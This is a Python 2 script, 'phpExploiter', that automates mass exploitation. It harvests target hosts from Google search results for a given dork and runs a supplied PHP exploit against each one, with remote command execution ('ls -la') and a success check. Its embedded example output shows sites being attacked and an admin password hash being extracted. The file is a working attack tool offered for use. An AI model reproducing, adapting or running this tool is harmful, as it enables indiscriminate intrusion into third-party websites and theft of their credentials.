#!/usr/bin/python
#This tool takes querys, uses google to retrieve 
#hosts then exploits them. Its setup for rgod type
#php exploits, found @ milw0rm.com/author/2415. 
#This saves alot of time copy and pasting sites to 
#your terminal. Takes a few arguments, look at bottom
#for more details and example. Email me if you want one
#setup different or anything else...
#
#d3hydr8[at]gmail[dot]com

import urllib2, sys, re, commands, getopt, StringIO, string

def gethosts():
	
	counter =  10
	hits = []
	
	while counter < num:
		url = 'http://www.google.com/search?hl=en&q=%22'+query+'%22&hl=en&lr=&start='+repr(counter)+'&sa=N'
		opener = urllib2.build_opener(url)
		opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
		data = opener.open(url).readlines()
		for line in data:
			hit = re.findall("\w+\.\w+\.?\w+./?\w+./?\w+./", line)
			for x in hit:
				if x != []:
					#Lets get rid of the nonsense and google hosts..this could
					#be done with a better regex but i havn't recieved one yet
					if re.search(r'\(', x) or re.search("<", x) or re.search("google", x): pass
					else: 
						if x not in hits: hits.append(x)
													
		counter += 10
	print "\n\tLoaded",len(hits),"hosts to exploit...\n"
	return hits
			
def exploiter(hits):
	
	#Lets make sure your exploit loads correctly.
	try:
  		open(ex)
	except(IOError), msg: 
  		print "Error:",msg
		print "Check your exploit path.\n"
  		sys.exit(1)
	
	for host in hits:
		print "[ Exploiting",host,"]"
		host = host.replace('/'," /",1).replace('www.',"")
		x = StringIO.StringIO(commands.getstatusoutput('php '+ex+' '+host+' ls -la ')[1]).readlines()
		for line in x:
			if re.search(success.lower(), line.lower()):
				print host ,line
			else: print "\n\tExploit failed...\n"
	
#................................................
	
if len(sys.argv) != 5:
	print "\n\t   d3hydr8[at]gmail[dot]com phpExploiter v1.0"
	print "\t--------------------------------------------------\n"
	print "Usage ./phpex.py <query> <num of hosts> <exploit> <success string>"
	print "ex: ./phpex.py inurl:/geeklog/ 200 geeklog.php 'Hi Master'\n"
	#success string is what would be printed if the exploit was successful, you can usually
	#find that at the bottom of the exploit. ex: "Exploit succeeded..."
	#This tool also works better if you edit out all the extra junk thats printed by the
	#exploit if it fails(echos). If your query has spaces like "Powered by Something" add +
	#symbols to help the search "Powered+by+Something" for example
	sys.exit(1)
else:
	query = sys.argv[1]
	num = int(sys.argv[2])
	ex = sys.argv[3]
	success = sys.argv[4]
	print "\n\t   d3hydr8[at]gmail[dot]com phpExploiter v1.0"
	print "\t--------------------------------------------------\n"
	print "\nQuerying google for hosts...\n"
	print "[ time depends on your number:",num,"]\n"
	exploiter(gethosts())
	
"""Examples:
	
sh-3.00$ ./goog-test.py Powered+by+Plogger 400 /home/d3hydr8/plogger.php "Exploit succeeded..."

           d3hydr8[at]gmail[dot]com phpExploiter v1.0
        --------------------------------------------------


        Loaded 119 hosts to exploit...

[ Exploiting classicrock.com/gallery/ ]

 Exploit succeeded...

classicrock.com /gallery/ Admin password hash -> d53c45633f5891a95aa5838a4bea7d3f

sh-3.00$ ./phpex.py Powered+by+Geeklog 100 /home/d3hydr8/geeklog.php "Hi Master"

           d3hydr8[at]gmail[dot]com phpExploiter v1.0
        --------------------------------------------------


        Loaded 140 hosts to exploit...

[ Exploiting www.techography.com/ ]

        Exploit failed...


"""